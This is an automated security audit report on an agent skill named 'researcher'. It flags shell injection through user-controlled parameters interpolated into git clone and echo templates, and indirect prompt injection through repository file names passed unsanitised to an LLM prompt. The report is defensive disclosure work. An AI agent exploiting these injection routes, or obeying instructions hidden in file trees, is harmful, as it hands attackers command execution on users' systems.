researcher

Fail

Audited by Gen Agent Trust Hub on Mar 7, 2026

Risk Level: HIGH (findings: COMMAND_EXECUTION, PROMPT_INJECTION)
Full Analysis
  • [COMMAND_EXECUTION]: Several nodes in the workflow defined in workflows/repo_analyzer.toml are vulnerable to shell injection via user-controlled parameters. The GitClone node uses a string template if [ ! -d '{{repo_dir}}' ]; then git clone '{{repo_url}}' '{{repo_dir}}'; fi which is executed in a shell environment. The repo_url and repo_dir parameters are interpolated directly into the command string. An attacker can break out of the single quotes using shell metacharacters (e.g., ' and ;) to execute arbitrary shell commands. The DeepAnalyze node interpolates the approved_shards JSON string directly into an echo command: echo 'Starting deep analysis for shards: {{approved_shards}}'. Since approved_shards is provided by the user during the approve action, it can be crafted to escape the echo command and execute malicious code.
  • [PROMPT_INJECTION]: The skill is vulnerable to indirect prompt injection. Untrusted data enters the system via the TreeScanner node in workflows/repo_analyzer.toml, which extracts the file tree of a remote repository. No boundary markers or instructions to ignore embedded instructions are used in the Architect LLM prompt when processing the file tree data. The skill has capabilities for command execution and file system access (cloning repositories and harvesting results). File names and paths from the remote repository are passed directly to the LLM without sanitization. An attacker could embed malicious instructions in the file system structure of a repository to manipulate the agent's logic.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Mar 7, 2026, 03:58 AM